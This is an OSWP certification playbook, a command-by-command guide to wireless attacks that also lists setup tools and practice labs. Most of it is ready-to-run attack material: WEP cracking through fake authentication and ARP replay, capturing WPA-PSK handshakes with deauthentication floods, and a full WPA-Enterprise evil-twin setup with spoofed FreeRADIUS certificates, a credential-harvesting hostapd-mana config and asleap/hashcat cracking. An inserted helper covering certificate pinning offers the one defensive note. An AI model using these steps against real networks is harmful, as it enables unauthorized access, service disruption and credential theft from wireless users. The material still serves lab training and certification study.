OSWP PlayBook: (Offensive Security Wireless Professional)

Summary

Kudos to my friend @Abdulrahman for starting the first version of the playbook; after contributing together we updated it with an organized structure, more steps and more practicality. You can download the PDF version of the book from here.

Contact & Follow Us

Github: Abdulrahman, Zeyad
Linkedin: Abdulrahman, Zeyad
Twitter/X: Abdulrahman, Zeyad
Website: Zeyad
Email: 0xexploiteagle@gmail.com, contact@zeyadazima.com

Follow The PlayBook Updates

Reconnaissance

Setup Interfaces

  • Set Interface to monitor mode
sudo airmon-ng check kill && sudo airmon-ng start <interface>
  • Set Interface to managed mode
sudo airmon-ng stop <interface>

Monitor Networks

  • Monitor networks
sudo airodump-ng --band abg --manufacturer <interface_in_monitor_mode>
  • Monitor networks including WPS
sudo airodump-ng --band abg --manufacturer --wps <interface_in_monitor_mode>
  • Monitor a specific network/BSSID
sudo airodump-ng --band abg --manufacturer --bssid <BSSID> -c <channel> <interface_in_monitor_mode>

Discover Hidden Networks

  • Get the ESSID of a hidden network using its BSSID
sudo airodump-ng --band abg --bssid <mac> wlan0mon
  • Get the ESSID of a hidden network by brute-forcing it
mdk4 wlan0mon p -t <BSSID> -f <wordlist>

Change Channel

  • The interface has to be in monitor mode:
sudo iwconfig <interface_in_monitor_mode> channel <number>

Change MAC Address

  1. Stop network manager
    systemctl stop network-manager
  2. Stop Interface
    ip link set wlan0 down
  3. Change the MAC address
    macchanger -m <new_mac_address> <interface>
  4. Start Interface
    ip link set wlan0 up

Tips

If this does not succeed, the cause may be one of the following:

  1. the interface name is wrong
  2. your interface is in monitor mode
    In the second case, fix it by setting the interface back to managed mode:
    sudo airmon-ng stop <int>

Connecting to Networks

Connect to Open Network

open.conf

network={
    ssid="Open_Network_Name"
    key_mgmt=NONE
}

Set ssid to the network name you want to connect to, then save it to open.conf and connect using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request an IP address from the DHCP server:

sudo dhclient wlan0 -v

Connect to WPA(1/2/3) Networks

WPA

network={
    ssid="SSID"
    psk="password"
    scan_ssid=1
    key_mgmt=WPA-PSK
    proto=WPA2
}

Set proto to the WPA version of the network:

  • WPA
  • WPA2
  • WPA3

Set ssid to the network name you want to connect to, then save it to wpa.conf and connect using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request an IP address from the DHCP server:

sudo dhclient wlan0 -v

Connect to WPA Enterprise

network={
  ssid="SSID"
  scan_ssid=1
  key_mgmt=WPA-EAP
  eap=PEAP
  identity="identity\user"
  password="password"
  phase1="peaplabel=0"
  phase2="auth=MSCHAPV2"
}

Set identity to the username and password to the password.
Set ssid to the network name you want to connect to, then save it to wpa_entp.conf and connect using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request an IP address from the DHCP server:

sudo dhclient wlan0 -v
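The PEAP block above carries no ca_cert= or domain_suffix_match= line, so the supplicant will complete its TLS tunnel with any RADIUS server that presents a certificate, which is exactly the client behaviour the hostapd-mana rogue AP in the Attacking WPA-Enterprise section relies on. As an added example that is not part of the original playbook, the shell helper below writes the same network block with the server certificate pinned and checks a config file for those two lines; the CA path, hostname suffix, SSID and identity used are assumed placeholders.

```shell
# Added example, not from the playbook. Writes a PEAP/MSCHAPv2 network block
# like the one above, but pinned to the organisation's RADIUS CA so a rogue
# AP with a self-made certificate cannot complete the TLS tunnel.
# $1 = SSID, $2 = identity (DOMAIN\user), $3 = path to the CA certificate that
# signed the RADIUS server cert (assumed), $4 = expected server hostname
# suffix (assumed), $5 = output file.
write_pinned_peap_conf() {
    cat > "$5" <<EOF
network={
  ssid="$1"
  scan_ssid=1
  key_mgmt=WPA-EAP
  eap=PEAP
  identity="$2"
  password="CHANGE_ME"
  # Only accept server certificates that chain to this CA (placeholder path).
  ca_cert="$3"
  # Reject servers whose certificate name does not end in this suffix.
  domain_suffix_match="$4"
  phase1="peaplabel=0"
  phase2="auth=MSCHAPV2"
}
EOF
}

# Returns 0 when a wpa_supplicant config pins the RADIUS server with both
# ca_cert= and domain_suffix_match= (commented-out lines do not count),
# 1 otherwise. Useful for auditing client profiles before rollout.
check_eap_pinning() {
    grep -q '^[[:space:]]*ca_cert=' "$1" &&
    grep -q '^[[:space:]]*domain_suffix_match=' "$1"
}
```

Run check_eap_pinning against the enterprise block given earlier in this section and it returns 1, which is the gap the rogue-AP attack exploits.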

Connect to WEP Network

network={
  ssid="SSID"
  key_mgmt=NONE
  wep_key0=""
  wep_tx_keyidx=0
}

Note: If the WEP key (wep_key0) is given in hex, write it without quotes; lowercase is the usual form, but uppercase hex digits also work.

Set ssid to the network name you want to connect to, then save it to wep.conf and connect using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request an IP address from the DHCP server:

sudo dhclient wlan0 -v

Attacking Networks

Attacking WEP Networks

  1. Capture packets with the WEP network info
sudo airodump-ng -w <pcap_file_name> --band abg --bssid <mac> -c <channel> wlan0mon

  2. Send fake authentication
sudo aireplay-ng -1 0 -a <BSSID> -h <Interface_Mac> -e "ESSID" <Interface>

Note: The interface MAC address can be anything; you can also spoof one if you would like to.

  3. ARP replay attack
sudo aireplay-ng --arpreplay -b <BSSID> -h <Interface_mac_address> <interface_in_monitor_mode>

  4. Crack the password
sudo aircrack-ng wep-01.cap

Attacking WPA-PSK Networks

  1. Gather information about the target network, such as the channel and BSSID
sudo airodump-ng --band abg <interface_in_monitor_mode>

A network shown as WPA with no version number next to it in the airodump-ng output is WPA1.

  2. Capture the handshake
sudo airodump-ng <interface_in_monitor_mode> --bssid <BSSID> -c <channel> -w <pcap_file_name>

  3. Perform a de-authentication attack (kick a specific client off the network to get the handshake)
sudo aireplay-ng -0 5 -c <client-mac> -a <BSSID> <interface_in_monitor_mode>

Note: Remove the -c option to send the de-authentication as a broadcast (kick all clients)

  4. Wait until the handshake is captured

  5. After getting the EAPOL (handshake), crack the password using aircrack-ng
sudo aircrack-ng -w <wordlist> capfile.cap

Connect to the network using the "Connecting to Networks" section

Attacking WPA-Enterprise

  1. First, gather information about the network, such as the BSSID and channel, to filter the networks:
sudo airodump-ng --band abg <interface_in_monitor_mode>

  2. Then capture the handshake of the enterprise network:
sudo airodump-ng --band abg -c <channel> --bssid <BSSID> -w <pcap_file_name> <interface_in_monitor_mode>

  3. After that, look at the clients of the network and try to de-authenticate a client to get the PMKID for the network:
sudo aireplay-ng -0 4 -a <BSSID> -c <client_mac> <interface_in_monitor_mode>

Then wait until you get the handshake; in some cases you can wait for a client to connect.

  4. Once you have it, go through the cap file and extract the identity (username).

  5. Extract the certificate.

Note: Save the certificate in DER format.

  6. Display the certificate information using this command:
openssl x509 -inform der -in CERTIFICATE_FILENAME -text

  7. Fake the network using FreeRADIUS. Go to the /etc/freeradius/3.0/certs path, then edit the following two files with the information obtained from the certificate. First the CA configuration:
nano ca.cnf

  8. Then the server configuration:
nano server.cnf

  9. After that, run the following commands under /etc/freeradius/3.0/certs to generate the Diffie-Hellman file for hostapd-mana:
rm dh
make

You may encounter an error at this step; you can ignore it.

  10. Create the EAP user file mana.eap_user:

*	PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]

  11. After that, create a fake access point by creating a file called network.conf in any other directory.
  12. Paste the following configuration into the file and modify it to your needs:
ssid=<ESSID>
interface=<managed_mode_interface>
driver=nl80211

channel=<channel>
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0

eap_user_file=/etc/hostapd-mana/mana.eap_user

ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh

auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP

mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1

  13. Set the interface back to managed mode.

  14. Then use the following command to create the fake AP:
sudo hostapd-mana <file.conf>

  15. Perform a de-authentication attack (kick a specific client off the network to get the handshake) using another interface:
sudo aireplay-ng -0 0 -c <client-mac> -a <BSSID> <interface_in_monitor_mode>

Note: Remove the -c option to send the de-authentication as a broadcast (kick all clients).
You need to use a second interface in monitor mode, and you need to set that interface to the same channel as the target network before performing the de-authentication attack (see "Change Channel" above).

Tip: If there are two enterprise networks with the same name, you need to perform the de-authentication attack on both of them.

  16. Once you get the handshake, copy and paste the asleap command from the output and add -W /path/to/wordlist:
asleap -C do:3b:8d:7b:22:00:0:91 -R 68:09:13:ac:e8:df:36:5f:42:94:fb:97:91:05:2:21:72:ff:b3:ce:c0:ca:26:f7 -W /usr/share/john/password.lst

Note: If that does not work for you, take the hash in hashcat format, put it in a file called hashfile and crack it with this command:
hashcat -a 0 -m 5500 hashfile rockyou.txt --force

  17. After getting the username and password, go to the "Connecting to Networks" section to connect to the network.

Install Required Tools & Packages:

FreeRADIUS

sudo apt update
sudo apt install freeradius freeradius-utils

Hostapd-Mana

sudo apt update
sudo apt install libssl-dev libnl-3-dev libnl-genl-3-dev
git clone https://github.com/sensepost/hostapd-mana.git
cd hostapd-mana/hostapd
make
sudo make install

Aircrack-ng

sudo apt update
sudo apt install aircrack-ng

Asleap

sudo apt update
sudo apt install asleap

Hashcat

sudo apt update
sudo apt install hashcat

John the Ripper

sudo apt update
sudo apt install john

Resources & Labs

Resources

Labs and Linux Dist

Labs 5.2.1

  • https://wifichallengelab.com
  • https://github.com/r4ulcl/WiFiChallengeLab-docker

Note: For this lab you won't need any physical wireless cards; everything is performed inside the lab's virtual machine, which includes everything you need. Shoutout to r4ulcl for this amazing lab.

Linux Dist

  • https://www.wifislax.com: Wireless Pentest OS
